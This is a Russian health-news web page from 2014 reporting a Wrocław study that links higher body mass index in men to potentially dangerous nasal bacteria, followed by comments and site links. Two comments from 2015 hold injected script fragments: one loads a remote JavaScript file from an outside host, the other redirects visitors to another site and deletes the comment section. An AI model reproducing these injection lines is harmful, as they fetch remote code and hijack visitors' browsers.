Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Смотрите в нос только стр...  >>  Смотрите в нос только стройным мужчинам!
 
Обратная связь
 

Смотрите в нос только стройным мужчинам!

Размер шрифта
11 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Разумеется, вы считаете своего мужчину сексуальным в любом случае. Однако если у него есть несколько лишних килограммов, ему не помешает задуматься о том, что происходит у него в носу. Об этом заговорили американские ученые, которые исследовали бактерии носовой полости у мужчин с разным телосложением.

Смотрите в нос только стройным мужчинам

Согласно исследованию, опубликованному в American Journal of Human Biology, мужчины с более высоким уровнем содержания жира в организме чаще имеют более опасные штаммы бактерий в носовой полости.

Ученые из Университета Вроцлава, Польша, собрали данные о росте и весе у 90 здоровых мужчин в возрасте от 18 до 34 лет. Они также взяли пробы из носа и горла, чтобы получить данные о видах бактерий у каждого из испытуемых. Мужчины, у которых в носу были обнаружены потенциально опасные бактерии (к примеру, вызывающие стафилококковую и стрептококковую инфекции) чаще имели более высокий индекс массы тела чем мужчины, у которых в пробах не содержалось вредных микроорганизмов.

Это говорит о том, что мужчины, которые имеют излишний вес, могут быть менее устойчивы к бактериальным инфекциям, в то время как их более стройные собратья лучше справляются с болезнями. Причины этого явления не до конца ясны, однако, по словам автора исследования, Богуслава Павловски, «мужчины с более низким индексом массы тела возможно имеют более сильную иммунную систему и более хорошие гены, ответственные за иммунитет». Теория, которую иногда называют «гипотезой хороших генов» – одна из причин, по которой мужчины с нормальным весом более привлекательны (как минимум, эволюционно) по сравнению с мужчинами с лишним весом или с ожирением: они ведь менее подвержены риску заболеть.

Мужчины с избыточным весом не только находятся в группе риска таких состояний как артериальная гипертензия, диабет и заболевания сердца. Они также с большей вероятностью имеют слабую иммунную систему. «Если иммунитет ослаблен, даже условно-патогенные бактерии могут вызвать серьезные заболевания», – отмечает доктор Павловски.

Другими словами, вот еще одна немаловажная причина, чтобы сбросить лишние килограммы и держать себя в форме.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чтобы худеть, надо есть. Что есть?   Бросили курить? Поправились? Во всем виноваты бактерии!   Проигрыш любимых спортсменов вызывает ожирение у болельщиков   Жир на этой части тела приводит к смерти  
28 июня 2013Хотите похудеть – пейте таблетки от эректильной дисфункции! 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
Как лишний вес влияет на ваши ноги и их красоту
Может ли кофе сжечь жир?
Убийцы эрекции вашего мужа

Тесты

1
Жиры, которые мы едим
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.